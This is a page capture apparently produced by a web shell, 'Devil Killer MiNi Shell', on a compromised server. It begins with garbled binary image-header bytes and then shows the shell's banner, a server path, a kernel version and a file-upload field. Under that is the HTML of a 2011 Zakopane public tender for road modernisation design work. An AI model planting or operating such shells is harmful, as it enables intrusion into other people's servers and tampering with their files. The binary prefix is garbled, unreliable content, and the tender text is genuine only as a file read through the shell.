JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110315/44692-N-2011.html

<p class="kh_header"><b>Zakopane: BZP.271.16.2011wykonanie dokumentacji projektowo - kosztorysowej dla następujących zadań inwestycyjnych: 
Zadanie A nr 109/2011 Modernizacja ul. Piłsudskiego 
Zadanie B nr 110/2011 Modernizacja ul. Grunwaldzkiej 
Zadanie C nr 112/2011 Modernizacja ul. Stolarczyka 
Zadanie D nr 149/2011 Modernizacja ul. Sabały
Zadanie E nr 158/2011 Modernizacja ul. Goszczyńskiego</b><br>
<b>Numer ogłoszenia: 44692 - 2011; data zamieszczenia: 15.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.16.2011wykonanie dokumentacji projektowo - kosztorysowej dla następujących zadań inwestycyjnych: 
Zadanie A nr 109/2011 Modernizacja ul. Piłsudskiego 
Zadanie B nr 110/2011 Modernizacja ul. Grunwaldzkiej 
Zadanie C nr 112/2011 Modernizacja ul. Stolarczyka 
Zadanie D nr 149/2011 Modernizacja ul. Sabały
Zadanie E nr 158/2011 Modernizacja ul. Goszczyńskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowo - kosztorysowej dla następujących zadań inwestycyjnych: 

Zadanie A nr 109/2011 Modernizacja ul. Piłsudskiego, 
Zadanie B nr 110/2011 Modernizacja ul. Grunwaldzkiej, 
Zadanie C nr 112/2011 Modernizacja ul. Stolarczyka, 
Zadanie D nr 149/2011 Modernizacja ul. Sabały,
Zadanie E nr 158/2011 Modernizacja ul. Goszczyńskiego.
1.	Zakres przedmiotu zamówienia obejmuje:
1.1.	sporządzenie bądź pozyskanie aktualnej mapy sytuacyjno - wysokościowej i ewidencyjnej, zawierającej wszystkie naniesienia niezbędne do wykonania dokumentacji projektowej służącej do uzyskania skutecznego zgłoszenia robót budowlanych i ich wykonania,
1.2.	pozyskanie badań nawierzchni, kruszyw gruntów i ugięć sprężystych,
1.3.	zaprojektowanie zabezpieczenia infrastruktury technicznej w razie potrzeby zaproponowanie rozwiązania kolizji, zabezpieczenie kabli w rurach osłonowych,
1.4.	uwzględnienie wycinki drzew kolidujących z uzyskaniem wymaganych parametrów drogi lub ich zabezpieczenie,
1.5.	przeprowadzenie przeglądu stanu technicznego kanalizacji opadowej na podstawie monitoringu i zakwalifikowanie odcinków kanalizacji do renowacji budowy 
lub przebudowy, z podaniem trzech stanów technicznych tych odcinków 
i sporządzeniem kosztorysów w zależności od przyjętej metody renowacji 
lub przebudowy (I stan techniczny - istniejący przewód zachowuje swoją nośność, dopuszczalne są drobne uszkodzenia, II stan techniczny -istniejący przewód - ośrodek gruntowy zachowuje zdolność do przenoszenia obciążeń, dopuszczalne są niewielkie ubytki, III stan techniczny -istniejący przewód - ośrodek gruntowy utracił zdolność 
do samodzielnego przenoszenia obciążeń),
1.6.	przeprowadzenie przeglądu stanu technicznego oświetlenia ulicznego polegającego 
na określeniu rezystancji izolacji kabli i rezystancji uziemienia słupów na podstawie wykonanych pomiarów oraz stanu słupów i opraw oświetlenia i zakwalifikowanie odcinków sieci do remontu lub przebudowy,
1.7.	pozyskanie wszystkich wymaganych opinii, uzgodnień i decyzji wynikających 
ze specyfiki opracowania, przygotowanie kompletnego wniosku do zgłoszenia robót budowlanych i uzyskanie skutecznego zgłoszenia robót budowlanych lub uzyskanie niezbędnych decyzji, w oparciu o obowiązujące przepisy (Prawo budowlane - Dz. U. 2006 r. Nr 156 poz. 1118 t.j. z późn. zm.) w zależności 
od dokonanej przez Projektanta kwalifikacji robót, 
1.8.	opracowanie dokumentacji projektowej z uwzględnieniem wymagań Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004r. (Dz. U. z 2004r., Nr 130, poz. 1389 w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym) dla wszystkich branż w formie planów, rysunków lub innych dokumentów umożliwiających jednoznaczne określenie rodzaju i zakresu robót budowlanych, dokładnej lokalizacji i innych uwarunkowań. Projekt musi być przedstawiony do akceptacji Zamawiającego,
1.9.	ustalenie przebiegu istniejącego pasa drogowego i sporządzenie operatów podziałowych służących do pozyskania gruntu na podstawie art. 73 Ustawy z dnia 
13 października 1998r Przepisy wprowadzające ustawy reformujące administrację publiczną wraz z uzyskaniem klauzuli Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej,
1.10.	opracowanie i przedstawienie Zamawiającemu do zatwierdzenia dokumentacji projektowo - kosztorysowej, we wszystkich branżach wynikających ze specyfiki opracowania,
1.11.	opracowanie wniosku i uzyskanie skutecznego zgłoszenia zamiaru rozpoczęcia robót budowlanych,
1.12.	opracowanie i przedstawienie Zamawiającemu do zatwierdzenia projektu wykonawczego,
1.13.	opracowanie i przedstawienie Zamawiającemu do zatwierdzenia Szczegółowych Specyfikacji Technicznych na wszystkie elementy realizowanych robót,
1.14.	opracowanie i przedstawienie Zamawiającemu do akceptacji projektu docelowej organizacji ruchu wraz z uzyskaniem stosownych zatwierdzeń,
1.15.	wykonanie wykazu właścicieli nieruchomości objętych inwestycją w wersji elektronicznej (Excel), z podaniem numerów działek i adresów, opartego na zapisach w księgach wieczystych,
1.16.	w opracowaniu należy uwzględnić przystosowanie do poruszania się osób niepełnosprawnych zgodnie z Zarządzeniem Nr 43/2010 Burmistrza Miasta Zakopane z dnia 8.03.2010r., w sprawie wymogów, jakim powinny odpowiadać przejścia dla pieszych, przejścia podziemne, przejścia naziemne, pochylnie, schody zewnętrzne, windy i chodniki z uwagi na potrzeby osób niepełnosprawnych- zarządzenie znajduje się w linku: http://www.zakopane.eu/index.php?option=16&action=news_show&news_id=3061 


Uwaga!  Przyjęte przez Projektanta założenia wstępne do projektu podlegają uzgodnieniu Zamawiającego.

2.	Forma opracowania dokumentacji:
2.1.	dokumentacja zbroszurowana (w sposób umożliwiający bezpośrednie wpięcie 
do segregatora biurowego) w ilości:
2.1.1	projekt wykonawczy 6 szt., 
2.1.2	specyfikacje istotnych warunków wykonania i odbioru robót 6 szt.,
2.1.3	przedmiar robót (kosztorys ślepy) 1 szt.,
2.1.4	kosztorys inwestorski 2 szt.,
2.2.	dokumentacja elektroniczna w formacie Word, PDF oraz dodatkowo kosztorys inwestorski w zapisie umożliwiającym odczyt w formacie Excel,
2.3.	układ i zawartość dokumentacji w wersji elektronicznej (np. nazwy poszczególnych katalogów i plików, podpisy i pieczątki osób sporządzających dokumentację - projektant, sprawdzający, wykonujący, weryfikator, uzgodnienia, itp.) powinny być identyczne z wersją papierową. Dokumentacja w formie elektronicznej powinna być odpowiednikiem wersji papierowej,
2.4.	dokumentacja powinna być zgodna z obowiązującymi przepisami, w tym:
2.4.1.	ustawa z dnia 7 lipca 1994 r. prawo budowlane (Dz.U. z 2003 r. nr 207, poz. 2016, z późn. zm.),
2.4.2.	ustawa z dnia 21 marca 1985 r. o drogach publicznych (Dz.U. z 2004 r. 
nr 204, poz. 2086, z późn. zm.),
2.4.3.	ustawa z 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. z 2003 r. nr 80, poz. 717, z późn. zm.),
2.4.4.	ustawa z 27 kwietnia 2001 r. prawo ochrony środowiska (Dz.U. z 2001r. 
nr 62, poz. 627, z późn. zm.),
2.4.5.	ustawa z 3 października 2008 r. o udostępnianiu informacji o środowisku 
i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz 
o ocenach oddziaływania na środowisko (Dz.U. z 2008 r. nr 199, poz. 1227, z późn. zm.),
2.4.6.	ustawa z 16 kwietnia 2004 r. o ochronie przyrody (Dz.U. z 2004 r. nr 92, poz. 880, z późn. zm.),
2.4.7.	ustawa z 17 maja 1989 r. prawo geodezyjne i kartograficzne (Dz.U. z 2000 r. nr 100, poz. 1086 z późn. zm.),
2.4.8.	ustawa z 18 lipca 2001 r. prawo wodne (Dz.U. z 2001 r. nr 115, poz. 1229, 
z późn. zm.),
2.4.9.	Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. z 1999 r. nr 43, poz. 430, z późn. zm.),
2.4.10.	Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz.U. z 2000 r. 
nr 63,poz.735, z późn. zm.), 
2.4.11.	Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 
24 września 1998 r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych (Dz.U. z 1998 r. nr 126, poz. 839 
z późn. zm.),
2.4.12.	Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. z 2004 r. nr 202, poz. 2072 z póżn. zm ),
2.4.13.	Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno użytkowym (Dz.U. z 2004 r. nr 130, poz. 1389),
2.4.14.	Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz.U. z 2003 r. nr 120, poz. 1126),
2.4.15.	Rozporządzenie Ministra Gospodarki Przestrzennej i Budownictwa z dnia 
21 lutego 1995 r. w sprawie rodzaju opracowań geodezyjno - kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz.U. z 1995r. nr 25, poz. 133),
2.4.16.	Rozporządzenie Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach 
oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. z 2003 r. nr 177, poz. 1729).


3.	Zakres planowanego zadania.
W ramach poszczególnych zadań:
a.	zadanie A Modernizacja ul. Piłsudskiego - droga klasy Z o długość 1,434km 
od Oczka wodnego do skrzyżowania z ul. Br. Czecha, chodnik obustronny 
z wyłączeniem wyremontowanego prawostronnego odcinka chodnika,
b.	zadanie B Modernizacja ul. Grunwaldzkiej - droga klasy L o długość 0,740km 
od Pl. Niepodległości do skrzyżowania z ulicami Droga do Białego i Kornela Makuszyńskiego, chodnik obustronny z wyłączeniem wyremontowanego prawostronnego odcinka chodnika,
c.	zadanie C Modernizacja ul. Stolarczyka, droga klasy D o długość 0,375km 
od skrzyżowania z ul. Kasprusie do skrzyżowania z ul. Kościeliska, chodnik jednostronny, 
d.	zadanie D Modernizacja ul. Sabały, droga klasy D o długość 0,360km 
od skrzyżowania z ul. Zamoyskiego do skrzyżowania z ul. Piłsudskiego, chodnik obustronny,
e.	zadanie E Modernizacja ul. Goszczyńskiego, droga jednopasowa klasy D 
o długości ok. 0,200km od skrzyżowania z ul. Makuszyńskiego do skrzyżowania 
z ul. Tetmajera, chodnik jednostronny.

Zakres planowanego zadania obejmuje dla każdego z zadań wykonanie przebudowy drogi w określonym zakresie w szczególności: 
3.1.modernizację istniejącej konstrukcji jezdni,
3.2	przebudowę istniejących zjazdów,
3.3	remont i/lub przebudowę chodnika, 
3.4	przebudowę urządzeń bezpieczeństwa ruchu,
3.5	przebudowę lub zabezpieczenie infrastruktury obcej, 
3.6	przebudowę systemu odwodnienia,
3.7	remont i/lub przebudowę sieci oświetlenia,
3.8	dostosowanie do poruszania się osób niepełnosprawnych,
3.9	uregulowanie zagospodarowania pasa drogowego ul. Piłsudskiego 
w rejonie Skoczni (strona prawa), poprzez wydzielenie chodnika, ścieżki rowerowej oraz miejsc postojowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5, 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości  4.800,00     zł  ( słownie:  cztery tysiące osiemset  złotych)

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85124047481111000048718666 Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj.29.03.2011 r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj.29.03.2011r.do godz. 12°° w  Biurze  ds. zamówień publicznych pok. nr 8 (parter).
        
  UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

ZWROT WADIUM : 
1.Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem ,że  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na  
          wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub 
         oświadczeń, o      których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw,  
         chyba że udowodni, że wynika to z   przyczyn nieleżących po jego stronie. 

2.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który wycofał 
ofertę przed upływem terminu składania ofert;
           3. Zamawiający żąda  ponownego wniesienia wadium przez wykonawcę którym zwrócono wadium na podstawie ust.1  jeżeli w wyniku  ostatecznego rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza. Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
     4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
    
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
         2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn   
              leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w ciągu ostatnich 3 lat przed  upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał    co najmniej 2 dokumentacje projektowo - kosztorysowe o zakresie odpowiadającym swoim rodzajem i wartością  usługom  stanowiącym przedmiot zamówienia, tj. wykonaniem dokumentacji projektowo - kosztorysowej remontu, budowy lub przebudowy drogi o długości każda  nie mniejszej niż 1 km.


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  że dysponuje z co najmniej jedną osobą, posiadającą uprawnienia  projektowe  w specjalności drogowej bez ograniczeń  lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, należące do właściwej Izby Inżynierów Budownictwa 



Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca jest zobowiązany przedłożyć do oferty  zestawienie asortymentu robót projektowych - wzór zestawienia  stanowi  załącznik nr 8 do siwz. 
    
Zestawienie asortymentu robót projektowych służy jedynie pomocniczo do sporządzenia oferty, a wypełnione przez wykonawcę  będzie załącznikiem do umowy o nazwie: wyceniony przedmiar robót projektowych i będzie służył 
do wyliczenia zmniejszeń w przypadku niewykonania całego przedmiotu umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
